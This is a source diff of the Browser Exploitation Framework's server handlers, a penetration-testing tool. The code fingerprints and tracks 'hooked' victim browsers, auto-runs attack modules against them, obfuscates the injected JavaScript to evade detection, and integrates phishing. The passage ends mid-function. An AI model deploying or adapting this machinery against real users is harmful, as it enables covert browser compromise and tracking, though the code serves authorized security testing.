+          default_browser = get_param(@data['results'], 'DefaultBrowser')
+          BD.set(session_id, 'DefaultBrowser', default_browser)
+
+          # get and store the hardware name
+          hw_name = get_param(@data['results'], 'Hardware')
+          if BeEF::Filters.is_valid_hwname?(hw_name)
+            BD.set(session_id, 'Hardware', hw_name)
+          else
+            self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
+          end
+
+          # get and store the date
+          date_stamp = get_param(@data['results'], 'DateStamp')
+          if BeEF::Filters.is_valid_date_stamp?(date_stamp)
+            BD.set(session_id, 'DateStamp', date_stamp)
+          else
+            self.err_msg "Invalid date returned from the hook browser's initial connection."
+          end
+
+          # get and store page title
+          page_title = get_param(@data['results'], 'PageTitle')
+          if BeEF::Filters.is_valid_pagetitle?(page_title)
+            BD.set(session_id, 'PageTitle', page_title)
+          else
+            self.err_msg "Invalid page title returned from the hook browser's initial connection."
+          end
+
+          # get and store page uri
+          page_uri = get_param(@data['results'], 'PageURI')
+          if BeEF::Filters.is_valid_url?(page_uri)
+            BD.set(session_id, 'PageURI', page_uri)
+          else
+            self.err_msg "Invalid page URL returned from the hook browser's initial connection."
+          end
+
+          # get and store the page referrer
+          page_referrer = get_param(@data['results'], 'PageReferrer')
+          if BeEF::Filters.is_valid_pagereferrer?(page_referrer)
+            BD.set(session_id, 'PageReferrer', page_referrer)
+          else
+            self.err_msg "Invalid page referrer returned from the hook browser's initial connection."
+          end
+
+          # get and store hostname
+          host_name = get_param(@data['results'], 'HostName')
+          if BeEF::Filters.is_valid_hostname?(host_name)
+            BD.set(session_id, 'HostName', host_name)
+          else
+            self.err_msg "Invalid host name returned from the hook browser's initial connection."
+          end
+
+          # get and store the browser plugins
+          browser_plugins = get_param(@data['results'], 'BrowserPlugins')
+          if BeEF::Filters.is_valid_browser_plugins?(browser_plugins)
+            BD.set(session_id, 'BrowserPlugins', browser_plugins)
+          else
+            self.err_msg "Invalid browser plugins returned from the hook browser's initial connection."
+          end
+
+          # get and store the system platform
+          system_platform = get_param(@data['results'], 'BrowserPlatform')
+          if BeEF::Filters.is_valid_system_platform?(system_platform)
+            BD.set(session_id, 'BrowserPlatform', system_platform)
+          else
+            self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
+          end
+
+          # get and store the hooked browser type
+          browser_type = get_param(@data['results'], 'BrowserType')
+          if BeEF::Filters.is_valid_browsertype?(browser_type)
+            BD.set(session_id, 'BrowserType', browser_type)
+          else
+            self.err_msg "Invalid hooked browser type returned from the hook browser's initial connection."
+          end
+
+          # get and store the zombie screen size and color depth
+          screen_size = get_param(@data['results'], 'ScreenSize')
+          if BeEF::Filters.is_valid_screen_size?(screen_size)
+            BD.set(session_id, 'ScreenSize', screen_size)
+          else
+            self.err_msg "Invalid screen size returned from the hook browser's initial connection."
+          end
+
+          # get and store the window size
+          window_size = get_param(@data['results'], 'WindowSize')
+          if BeEF::Filters.is_valid_window_size?(window_size)
+            BD.set(session_id, 'WindowSize', window_size)
+          else
+            self.err_msg "Invalid window size returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for browser components
+          components = [
+              'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
+              'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX',
+              'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP',
+              'hasSessionCookies', 'hasPersistentCookies'
+          ]
+          components.each do |k|
+            v = get_param(@data['results'], k)
+            if BeEF::Filters.is_valid_yes_no?(v)
+              BD.set(session_id, k, v)
+            else
+              self.err_msg "Invalid value for #{k} returned from the hook browser's initial connection."
+            end
+          end
+
+          # get and store the value for CPU
+          cpu_type = get_param(@data['results'], 'CPU')
+          if BeEF::Filters.is_valid_cpu?(cpu_type)
+            BD.set(session_id, 'CPU', cpu_type)
+          else
+            self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for TouchEnabled
+          touch_enabled = get_param(@data['results'], 'TouchEnabled')
+          if BeEF::Filters.is_valid_yes_no?(touch_enabled)
+            BD.set(session_id, 'TouchEnabled', touch_enabled)
+          else
+            self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
+          end
+
+          # log a few info of newly hooked zombie in the console
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
+
+
+          # Call autorun modules
+          if config.get('beef.autorun.enable')
+            autorun = []
+            BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
+              if v.has_key?('autorun') and v['autorun'] == true
+                target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
+                if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                else
+                  print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
+                end
+              end
+            }
+            if autorun.length > 0
+              print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
+            end
+          end
+
+          if config.get('beef.integration.phishing_frenzy.enable')
+            # get and store the browser plugins
+            victim_uid = get_param(@data['results'], 'PhishingFrenzyUID')
+            if BeEF::Filters.alphanums_only?(victim_uid)
+              BD.set(session_id, 'PhishingFrenzyUID', victim_uid)
+            else
+              self.err_msg "Invalid PhishingFrenzy Victim UID returned from the hook browser's initial connection."
+            end
+          end
+        end
+
+        def get_param(query, key)
+          (query.class == Hash and query.has_key?(key)) ? query[key] : nil
+        end
+      end
+
+
+    end
+  end
+end
+
--- a/core/main/handlers/commands.rb
+++ b/core/main/handlers/commands.rb
@@ -1,90 +1,81 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-  
-  class Commands
-    
-    include BeEF::Core::Handlers::Modules::BeEFJS
-    include BeEF::Core::Handlers::Modules::Command
-    
-    @data = {}
-    
-    # Handles command data
-    # @param [Hash] data Data from command execution
-    # @param [Class] kclass Class of command
-    # @todo Confirm argument data variable type.
-    def initialize(data, kclass)
-      @kclass = BeEF::Core::Command.const_get(kclass.capitalize)
-      @data = data
-      setup()
-    end
-    
-    # Initial setup function, creates the command module and saves details to datastore
-    def setup()
+  module Core
+    module Handlers
+
+      class Commands
+
+        include BeEF::Core::Handlers::Modules::BeEFJS
+        include BeEF::Core::Handlers::Modules::Command
+
+        @data = {}
+
+        # Handles command data
+        # @param [Hash] data Data from command execution
+        # @param [Class] kclass Class of command
+        # @todo Confirm argument data variable type [radoen]: type is Hash confirmed.
+        def initialize(data, kclass)
+          @kclass = BeEF::Core::Command.const_get(kclass.capitalize)
+          @data = data
+          setup()
+        end
+
+        # Initial setup function, creates the command module and saves details to datastore
+        def setup()


-      @http_params = @data['request'].params
-      @http_header = Hash.new
-      http_header = @data['request'].env.select {|k,v| k.to_s.start_with? 'HTTP_'}
-                      .each {|key,value|
-                            @http_header[key.sub(/^HTTP_/, '')] = value
-                      }
+          @http_params = @data['request'].params
+          @http_header = Hash.new
+          http_header = @data['request'].env.select { |k, v| k.to_s.start_with? 'HTTP_' }.each { |key, value|
+            @http_header[key.sub(/^HTTP_/, '')] = value
+          }

-      # @note get and check command id from the request
-      command_id  = get_param(@data, 'cid')
-      # @todo ruby filter needs to be updated to detect fixnums not strings
-      command_id = command_id.to_s()
-      (print_error "command_id is invalid";return) if not BeEF::Filters.is_valid_command_id?(command_id.to_s())
+          # @note get and check command id from the request
+          command_id = get_param(@data, 'cid')
+          # @todo ruby filter needs to be updated to detect fixnums not strings
+          command_id = command_id.to_s()
+          (print_error "command_id is invalid"; return) if not BeEF::Filters.is_valid_command_id?(command_id.to_s())

-      # @note get and check session id from the request
-      beefhook = get_param(@data, 'beefhook')
-      (print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
+          # @note get and check session id from the request
+          beefhook = get_param(@data, 'beefhook')
+          (print_error "BeEFhook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
+
+          result = get_param(@data, 'results')
+
+          # @note create the command module to handle the response
+          command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))
+          command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook)
+          command.session_id = beefhook
+          if command.respond_to?(:post_execute)
+            command.post_execute
+          end
+          #@todo this is the part that store result on db and the modify will be accessible from all the framework and so UI too
+          # @note get/set details for datastore and log entry
+          command_friendly_name = command.friendlyname
+          (print_error "command friendly name is empty"; return) if command_friendly_name.empty?
+          command_results = get_param(@data, 'results')
+          (print_error "command results are empty"; return) if command_results.empty?
+          # @note save the command module results to the datastore and create a log entry
+          command_results = {'data' => command_results}
+          BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results)
+
+        end
+
+        # Returns parameter from hash
+        # @param [Hash] query Hash of data to return data from
+        # @param [String] key Key to search for and return inside `query`
+        # @return Value referenced in hash at the supplied key
+        def get_param(query, key)
+          return (query.class == Hash and query.has_key?(key)) ? query[key] : nil
+        end

-      # @note create the command module to handle the response
-      command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))  
-      command.build_callback_datastore(@http_params, @http_header) 
-      command.session_id = beefhook 
-      if command.respond_to?(:post_execute)
-        command.post_execute
      end

-      # @note get/set details for datastore and log entry
-      command_friendly_name = command.friendlyname
-      (print_error "command friendly name is empty";return) if command_friendly_name.empty?
-      command_results = get_param(@data, 'results')
-      (print_error "command results are empty";return) if command_results.empty?
-      # @note save the command module results to the datastore and create a log entry
-      command_results = {'data' => command_results}
-      BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results) 

    end
-    
-    # Returns parameter from hash
-    # @param [Hash] query Hash of data to return data from
-    # @param [String] key Key to search for and return inside `query`
-    # @return Value referenced in hash at the supplied key
-    def get_param(query, key)
-        return (query.class == Hash and query.has_key?(key)) ? query[key] : nil
-    end
-
  end
-    
-  
-end
-end
 end
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -1,71 +1,75 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
 module Handlers
  
   # @note This class handles connections from hooked browsers to the framework.
-    class HookedBrowsers
+    class HookedBrowsers < BeEF::Core::Router::Router

    
    include BeEF::Core::Handlers::Modules::BeEFJS
    include BeEF::Core::Handlers::Modules::Command

+    #antisnatchor: we don't want to have anti-xss/anti-framing headers in the HTTP response for the hook file.
+    configure do
+      disable :protection
+    end
    
    # Process HTTP requests sent by a hooked browser to the framework.
    # It will update the database to add or update the current hooked browser
    # and deploy some command modules or extensions to the hooked browser.
-    def call(env)
+    get '/' do
      @body = ''
-      @request = Rack::Request.new(env)
-      @params = @request.query_string
-      @response = Rack::Response.new(body=[], 200, header={})
+      @params = request.query_string
+      #@response = Rack::Response.new(body=[], 200, header={})
      config = BeEF::Core::Configuration.instance
      
      # @note check source ip address of browser
      permitted_hooking_subnet = config.get('beef.restrictions.permitted_hooking_subnet')
      target_network = IPAddr.new(permitted_hooking_subnet)
-      if not target_network.include?(@request.ip)
-        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{@request.ip}) rejected.")
-        @response = Rack::Response.new(body=[], 500, header={})
-        return
+      if not target_network.include?(request.ip)
+        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{request.ip}) rejected.")
+        error 500
      end

      # @note get zombie if already hooked the framework
      hook_session_name = config.get('beef.http.hook_session_name')
-      hook_session_id = @request[hook_session_name]
+      hook_session_id = request[hook_session_name]
      hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) if not hook_session_id.nil?

      # @note is a new browser so return instructions to set up the hook
      if not hooked_browser 
        
        # @note generate the instructions to hook the browser
-        host_name = @request.host 
+        host_name = request.host
        (print_error "Invalid host name";return) if not BeEF::Filters.is_valid_hostname?(host_name)
        build_beefjs!(host_name)

      # @note is a known browser so send instructions 
      else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
        # @note record the last poll from the browser
        hooked_browser.lastseen = Time.new.to_i
        
        # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != @request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{@request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = @request.ip
+        if config.get('beef.http.use_x_forward_for') == true
+          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
+            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
+          end
+        else
+          if hooked_browser.ip != request.ip
+           BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+           hooked_browser.ip = request.ip
+          end
        end
      
        hooked_browser.count!
@@ -76,37 +80,18 @@ module Handlers
        zombie_commands.each{|command| add_command_instructions(command, hooked_browser)}

        # @note We dynamically get the list of all browser hook handler using the API and register them
-        BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, @request, @response)
+        BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, request, response)
      end

      # @note set response headers and body
-      @response = Rack::Response.new(
-            body = [@body],
-            status = 200,
-            header = {
-              'Pragma' => 'no-cache',
+     headers  'Pragma' => 'no-cache',
              'Cache-Control' => 'no-cache',
              'Expires' => '0',
              'Content-Type' => 'text/javascript',
              'Access-Control-Allow-Origin' => '*',
              'Access-Control-Allow-Methods' => 'POST, GET'
-            }
-        )
-      
+      @body
    end
-
-    private
-    
-    # @note Object representing the HTTP request
-    @request
-    
-    # @note Object representing the HTTP response
-    @response
-    
-    # @note A string containing the list of BeEF components active in the hooked browser
-    # @todo Confirm this variable is still used
-    @beef_js_cmps
-    
  end
  
 end
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -1,106 +1,178 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-module Modules
-  
-  # @note Purpose: avoid rewriting several times the same code.
-  module BeEFJS
-    
-    # Builds the default beefjs library (all default components of the library).
-    # @param [Object] req_host The request object
-    def build_beefjs!(req_host)
+  module Core
+    module Handlers
+      module Modules

-      # @note set up values required to construct beefjs
-      beefjs = '' 
-      # @note location of sub files      
-      beefjs_path = "#{$root_dir}/core/main/client/"
-      js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
+        # @note Purpose: avoid rewriting several times the same code.
+        module BeEFJS

-      # @note construct the beefjs string from file(s)
-      js_sub_files.each {|js_sub_file_name|
-        js_sub_file_abs_path = beefjs_path + js_sub_file_name 
-        beefjs << (File.read(js_sub_file_abs_path) + "\n\n") 
-      }
-      
-      # @note create the config for the hooked browser session
-      config = BeEF::Core::Configuration.instance
-      hook_session_name = config.get('beef.http.hook_session_name')
-      hook_session_config = BeEF::Core::Server.instance.to_h
+          # Builds the default beefjs library (all default components of the library).
+          # @param [Object] req_host The request object
+          def build_beefjs!(req_host)
+            config = BeEF::Core::Configuration.instance
+            # @note set up values required to construct beefjs
+            beef_js = ''
+            # @note location of sub files
+            beef_js_path = "#{$root_dir}/core/main/client/"

-      # @note if http_host="0.0.0.0" in config ini, use the host requested by client
-      if hook_session_config['beef_host'].eql? "0.0.0.0" 
-        hook_session_config['beef_host'] = req_host 
-        hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)  
-      end
-      
-      # @note populate place holders in the beefjs string and set the response body
-      eruby = Erubis::FastEruby.new(beefjs)
-      @body << eruby.evaluate(hook_session_config)
-  
-    end
-    
-    # Finds the path to js components
-    # @param [String] component Name of component
-    # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
-    def find_beefjs_component_path(component)
-      component_path = component
-      component_path.gsub!(/beef./, '')
-      component_path.gsub!(/\./, '/')
-      component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
-      
-      return false if not File.exists? component_path
-      
-      component_path
-    end
-    
-    # Builds missing beefjs components.
-    # @param [Array] beefjs_components An array of component names
-    def build_missing_beefjs_components(beefjs_components)
-      # @note verifies that @beef_js_cmps is not nil to avoid bugs
-      @beef_js_cmps = '' if @beef_js_cmps.nil?
-      
-      if beefjs_components.is_a? String
-        beefjs_components_path = find_beefjs_component_path(beefjs_components)
-        raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
-        beefjs_components = {beefjs_components => beefjs_components_path} 
-      end
+            # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
+            ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js lib/webrtcadapter.js)

-      beefjs_components.keys.each {|k|
-        next if @beef_js_cmps.include? beefjs_components[k]
-        
-        # @note path to the component
-        component_path = beefjs_components[k]
-        
-        # @note we output the component to the hooked browser
-        @body << File.read(component_path)+"\n\n"
-        
-        # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
-        if @beef_js_cmps.eql? ''
-          @beef_js_cmps = component_path
-        else
-          @beef_js_cmps += ",#{component_path}"
+            # @note BeEF libraries: need Eruby evaluation and obfuscation
+            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
+            # @note Load websocket library only if WS server is enabled in config.yaml
+            if config.get("beef.http.websocket.enable") == true
+              beef_js_sub_files << "websocket.js"
+            end
+            # @note Load webrtc library only if WebRTC extension is enabled
+            if config.get("beef.extension.webrtc.enable") == true
+              beef_js_sub_files << "webrtc.js"
+            end
+
+            # @note antisnatchor: leave timeout.js as the last one!
+            beef_js_sub_files << "timeout.js"
+
+            ext_js_to_obfuscate = ''
+            ext_js_to_not_obfuscate = ''
+
+            # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
+            # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
+            ext_js_sub_files.each { |ext_js_sub_file|
+              if config.get("beef.extension.evasion.enable")
+                if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
+                  print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
+                  # do not obfuscate the file
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                else
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                end
+              else
+                # Evasion is not enabled, do not obfuscate anything
+                ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+              end
+            }
+
+            # @note construct the beef_js string from file(s)
+            beef_js_sub_files.each { |beef_js_sub_file|
+              beef_js_sub_file_path = beef_js_path + beef_js_sub_file
+              beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
+            }
+
+            # @note create the config for the hooked browser session
+            hook_session_config = BeEF::Core::Server.instance.to_h
+
+            # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            unless hook_session_config['beef_public'].nil?
+              if hook_session_config['beef_host'] != hook_session_config['beef_public']
+                hook_session_config['beef_host'] = hook_session_config['beef_public']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
+              end
+            end
+            if hook_session_config['beef_host'].eql? "0.0.0.0"
+              hook_session_config['beef_host'] = req_host
+              hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
+            end
+
+            # @note set the XHR-polling timeout
+            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
+
+            # @note set the hook file path and BeEF's cookie name
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
+
+            # @note if http_port <> public_port in config ini, use the public_port
+            unless hook_session_config['beef_public_port'].nil?
+              if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+                hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+                if hook_session_config['beef_public_port'] == '443'
+                  hook_session_config['beef_url'].sub!(/http:/, 'https:')
+                end
+              end
+            end
+
+            # @note Set some WebSocket properties
+            if config.get("beef.http.websocket.enable")
+              hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
+              hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
+              hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
+              hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
+            end
+
+            # @note Set if PhishingFrenzy integration is enabled
+            if config.get("beef.integration.phishing_frenzy.enable")
+              hook_session_config['phishing_frenzy_enable'] = config.get("beef.integration.phishing_frenzy.enable")
+            end
+
+            # @note populate place holders in the beef_js string and set the response body
+            eruby = Erubis::FastEruby.new(beef_js)
+            @hook = eruby.evaluate(hook_session_config)
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
+            else
+              @final_hook = ext_js_to_not_obfuscate + @hook
+            end
+
+            # @note Return the final hook to be sent to the browser
+            @body << @final_hook
+
+          end
+
+          # Finds the path to js components
+          # @param [String] component Name of component
+          # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
+          def find_beefjs_component_path(component)
+            component_path = component
+            component_path.gsub!(/beef./, '')
+            component_path.gsub!(/\./, '/')
+            component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
+
+            return false if not File.exists? component_path
+
+            component_path
+          end
+
+          # Builds missing beefjs components.
+          # @param [Array] beefjs_components An array of component names
+          def build_missing_beefjs_components(beefjs_components)
+            # @note verifies that @beef_js_cmps is not nil to avoid bugs
+            @beef_js_cmps = '' if @beef_js_cmps.nil?
+
+            if beefjs_components.is_a? String
+              beefjs_components_path = find_beefjs_component_path(beefjs_components)
+              raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
+              beefjs_components = {beefjs_components => beefjs_components_path}
+            end
+
+            beefjs_components.keys.each { |k|
+              next if @beef_js_cmps.include? beefjs_components[k]
+
+              # @note path to the component
+              component_path = beefjs_components[k]
+
+              # @note we output the component to the hooked browser
+              @body << File.read(component_path)+"\n\n"
+
+              # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
+              if @beef_js_cmps.eql? ''
+                @beef_js_cmps = component_path
+              else
+                @beef_js_cmps += ",#{component_path}"
+              end
+            }
+          end
        end
-      }
+      end
    end
-
  end
-  
-end
-end
-end
 end
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -1,70 +1,81 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-module Modules
+  module Core
+    module Handlers
+      module Modules

-  module Command
+        module Command

-    # Adds the command module instructions to a hooked browser's http response. 
-    # @param [Object] command Command object
-    # @param [Object] hooked_browser Hooked Browser object
-    def add_command_instructions(command, hooked_browser)
+          # Adds the command module instructions to a hooked browser's http response.
+          # @param [Object] command Command object
+          # @param [Object] hooked_browser Hooked Browser object
+          def add_command_instructions(command, hooked_browser)
+            (print_error "hooked_browser is nil"; return) if hooked_browser.nil?
+            (print_error "hooked_browser.session is nil"; return) if hooked_browser.session.nil?
+            (print_error "hooked_browser is nil"; return) if command.nil?
+            (print_error "hooked_browser.command_module_id is nil"; return) if command.command_module_id.nil?

-      (print_error "hooked_browser is nil";return) if hooked_browser.nil?
-      (print_error "hooked_browser.session is nil";return) if hooked_browser.session.nil?
-      (print_error "hooked_browser is nil";return) if command.nil?
-      (print_error "hooked_browser.command_module_id is nil";return) if command.command_module_id.nil?
+            config = BeEF::Core::Configuration.instance
+            # @note get the command module
+            command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
+            (print_error "command_module is nil"; return) if command_module.nil?
+            (print_error "command_module.path is nil"; return) if command_module.path.nil?

-      # @note get the command module
-      command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)      
-      (print_error "command_module is nil";return) if command_module.nil?
-      (print_error "command_module.path is nil";return) if command_module.path.nil?
+            if (command_module.path.match(/^Dynamic/))
+              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
+            else
+              key = BeEF::Module.get_key_by_database_id(command.command_module_id)
+              (print_error "Could not find command module with ID #{command.command_module_id}"; return) if key.nil?
+              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
+            end
+
+            command_module.command_id = command.id
+            command_module.session_id = hooked_browser.session
+            command_module.build_datastore(command.data)
+            command_module.pre_send
+
+            build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
+
+            ws = BeEF::Core::Websocket::Websocket.instance
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @output = evasion.obfuscate(command_module.output)
+            else
+              @output = command_module.output
+            end
+
+            #todo antisnatchor: remove this gsub crap adding some hook packing.
+            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
+              #content = command_module.output.gsub('//
+              #//
+              #//   Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              #//   See the file 'doc/COPYING' for copying permission
+              #//
+              #//', "")
+              ws.send(@output, hooked_browser.session)
+            else
+              @body << @output + "\n\n"
+            end
+            # @note prints the event to the console
+            if BeEF::Settings.console?
+              name = command_module.friendlyname || kclass
+              print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']"
+            end
+
+            # @note flag that the command has been sent to the hooked browser
+            command.instructions_sent = true
+            command.save
+          end
+
+        end

-      if(command_module.path.match(/^Dynamic/))
-         command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
-      else
